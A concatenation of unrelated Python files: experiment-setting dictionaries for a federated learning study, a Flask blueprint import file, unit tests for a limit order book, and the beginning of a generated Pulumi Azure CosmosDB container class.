'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting3.npy', dictionary3)
"""
Exper 1:
(4) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server}
np.save(path_setting+'Exper1_setting4.npy', dictionary4)
"""
Exper 1:
(5) 10 users, R = 0.6, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.6
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary5 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper1_setting5.npy', dictionary5)
"""
Exper 1:
(6) 10 users, R = 0.8, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.8
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary6 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper1_setting6.npy', dictionary6)
"""
Exper 2:
(1) 10 users, R = 0.4, Communication period = 2;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [2]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting1.npy', dictionary1)
"""
Exper 2:
(2) 10 users, R = 0.4, Communication period = 4;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [4]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting2.npy', dictionary2)
"""
Exper 2:
(3) 10 users, R = 0.4, Communication period = 8;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [8]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting3.npy', dictionary3)
"""
Exper 2:
(4) 10 users, R = 0.4, Communication period = 32;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [32]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper2_setting4.npy', dictionary4)
"""
Exper 3:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 2000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 2000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting1.npy', dictionary1)
"""
Exper 3:
(2) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 3000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 3000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting2.npy', dictionary2)
"""
Exper 3:
(3) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 4000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 4000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper3_setting3.npy', dictionary3)
"""
Exper 4:
(1) 20 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 20 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting1.npy', dictionary1)
"""
Exper 4:
(2) 20 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 20; ResNet18 with group normalization
is used for training.
"""
size = 20 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 20
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting2.npy', dictionary2)
"""
Exper 4:
(3) 30 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 30 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting3.npy', dictionary3)
"""
Exper 4:
(4) 30 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 30; ResNet18 with group normalization
is used for training.
"""
size = 30 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 30
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting4.npy', dictionary4)
"""
Exper 5:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training, grouping-based model average H = 1.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 1
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper5_setting1.npy', dictionary1)
"""
Exper 6:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with batch normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper6_setting1.npy', dictionary1)
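Since every block above only varies a few fields, the same dictionaries could be produced by one small helper; this is a sketch (the name `make_setting` and its defaults are illustrative, not part of the repo):

```python
def make_setting(num_ue, basicLabelRatio, cp, iid, num_comm_ue=10,
                 num_data_server=1000, H=0, model='res_gn'):
    """Build one experiment dictionary with the same keys as the blocks above."""
    return {'size': num_ue + 1, 'batch_size': 64, 'cp': [cp],
            'basicLabelRatio': basicLabelRatio, 'model': [model], 'iid': iid,
            'num_comm_ue': num_comm_ue, 'k_img': 65536, 'epoches': 300,
            'H': H, 'num_data_server': num_data_server}

# Exper 2 sweeps the communication period with everything else fixed:
exper2 = {'Exper2_setting%d' % (i + 1): make_setting(10, 0.4, cp, 0)
          for i, cp in enumerate([2, 4, 8, 32])}
```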
# ---- FlaskTemplate/{{cookiecutter.project}}/{{cookiecutter.project_name}}/blueprints/__init__.py | ThaWeatherman/FlaskTemplate | MIT ----
from .api import api_blueprint
from .auth import auth_blueprint
from .errors import error_blueprint
from .main import main_blueprint
| 26.6 | 35 | 0.849624 | 20 | 133 | 5.45 | 0.4 | 0.357798 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120301 | 133 | 4 | 36 | 33.25 | 0.931624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
387fd175533abc05671c4cf6e05d652e55dc3ab8 | 13,196 | py | Python | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 67 | 2020-04-09T23:36:26.000Z | 2022-03-24T06:55:38.000Z | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 1 | 2022-02-23T03:37:47.000Z | 2022-02-23T23:48:51.000Z | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 24 | 2020-01-17T13:47:49.000Z | 2022-03-29T21:09:23.000Z | """Test cases for the lob module."""
from unittest import TestCase
from .. import limit_order_book
class ShouldInitializeLimitOrderBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
self.assertIsInstance(book, limit_order_book.LimitOrderBook)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: limit
#
class ShouldPlaceSellLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(100, book.volume_sell())
self.assertEqual(100, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceSellLimitOrderByValue(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit(False, 1, 100, 50)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(100, book.volume_sell())
self.assertEqual(100, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(100, book.volume_buy())
self.assertEqual(100, book.volume_buy(50))
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyLimitOrderByValue(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit(True, 1, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(100, book.volume_buy())
self.assertEqual(100, book.volume_buy(50))
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
#
# MARK: limit match
#
class ShouldMatchSellLimitOrderWithIncomingBuy(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.limit_buy(2, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(50))
self.assertEqual(0, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldMatchBuyLimitOrderWithIncomingSell(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
book.limit_sell(2, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(50))
self.assertEqual(0, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: cancel
#
class ShouldCancelSellLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
self.assertTrue(book.has(1))
book.cancel(1)
self.assertFalse(book.has(1))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldCancelBuyLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
self.assertTrue(book.has(1))
book.cancel(1)
self.assertFalse(book.has(1))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: market
#
class ShouldPlaceSellMarketOrderEmptyBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.market_sell(1, 100)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldPlaceBuyMarketOrderEmptyBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.market_buy(1, 100)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldPlaceSellMarketOrderAndMatch(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
book.market_sell(1, 10)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(90, book.volume_buy())
self.assertEqual(90, book.volume_buy(50))
self.assertEqual(90, book.volume())
self.assertEqual(90, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyMarketOrderAndMatch(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.market_buy(1, 10)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(90, book.volume_sell())
self.assertEqual(90, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(90, book.volume())
self.assertEqual(90, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
#
# MARK: clear
#
class ShouldClearSellLimitOrders(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.limit_sell(2, 100, 50)
book.limit_sell(3, 100, 50)
self.assertTrue(book.has(1))
self.assertTrue(book.has(2))
self.assertTrue(book.has(3))
book.clear()
self.assertFalse(book.has(1))
self.assertFalse(book.has(2))
self.assertFalse(book.has(3))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldClearBuyLimitOrders(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
        book.limit_buy(1, 100, 50)
        book.limit_buy(2, 100, 50)
        book.limit_buy(3, 100, 50)
self.assertTrue(book.has(1))
self.assertTrue(book.has(2))
self.assertTrue(book.has(3))
book.clear()
self.assertFalse(book.has(1))
self.assertFalse(book.has(2))
self.assertFalse(book.has(3))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
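For readers without the compiled `limit_order_book` extension, the price-crossing behavior these tests assert can be sketched in pure Python. `MiniBook` is a hypothetical stand-in: it keeps aggregate size per price level and omits order ids and per-order FIFO queues for brevity.

```python
class MiniBook:
    """Minimal price-level book: aggregate size per price, no order ids."""

    def __init__(self):
        self.buys = {}   # price -> resting size
        self.sells = {}  # price -> resting size

    def best_buy(self):
        return max(self.buys) if self.buys else 0

    def best_sell(self):
        return min(self.sells) if self.sells else 0

    def _match(self, size, book, pick, crosses):
        # Fill against the best resting level while the price still crosses.
        while size and book:
            p = pick(book)
            if not crosses(p):
                break
            take = min(size, book[p])
            book[p] -= take
            size -= take
            if book[p] == 0:
                del book[p]
        return size

    def limit_buy(self, size, price):
        rest = self._match(size, self.sells, min, lambda p: p <= price)
        if rest:
            self.buys[price] = self.buys.get(price, 0) + rest

    def limit_sell(self, size, price):
        rest = self._match(size, self.buys, max, lambda p: p >= price)
        if rest:
            self.sells[price] = self.sells.get(price, 0) + rest
```

For example, a resting buy of 100 at price 50 hit by a sell of 10 leaves 90 resting at 50, which mirrors the partial-fill arithmetic asserted in `ShouldPlaceSellMarketOrderAndMatch` above.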
# ---- sdk/python/pulumi_azure/cosmosdb/sql_container.py | henriktao/pulumi-azure | ECL-2.0, Apache-2.0 ----
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlContainerArgs', 'SqlContainer']
@pulumi.input_type
class SqlContainerArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
database_name: pulumi.Input[str],
partition_key_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']] = None,
conflict_resolution_policy: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]] = None):
"""
The set of arguments for constructing a SqlContainer resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input['SqlContainerConflictResolutionPolicyArgs'] conflict_resolution_policy: A `conflict_resolution_policy` blocks as defined below.
:param pulumi.Input[int] default_ttl: The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerIndexingPolicyArgs'] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
        :param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[int] throughput: The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "partition_key_path", partition_key_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if conflict_resolution_policy is not None:
pulumi.set(__self__, "conflict_resolution_policy", conflict_resolution_policy)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if indexing_policy is not None:
pulumi.set(__self__, "indexing_policy", indexing_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if partition_key_version is not None:
pulumi.set(__self__, "partition_key_version", partition_key_version)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if unique_keys is not None:
pulumi.set(__self__, "unique_keys", unique_keys)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> pulumi.Input[str]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@partition_key_path.setter
def partition_key_path(self, value: pulumi.Input[str]):
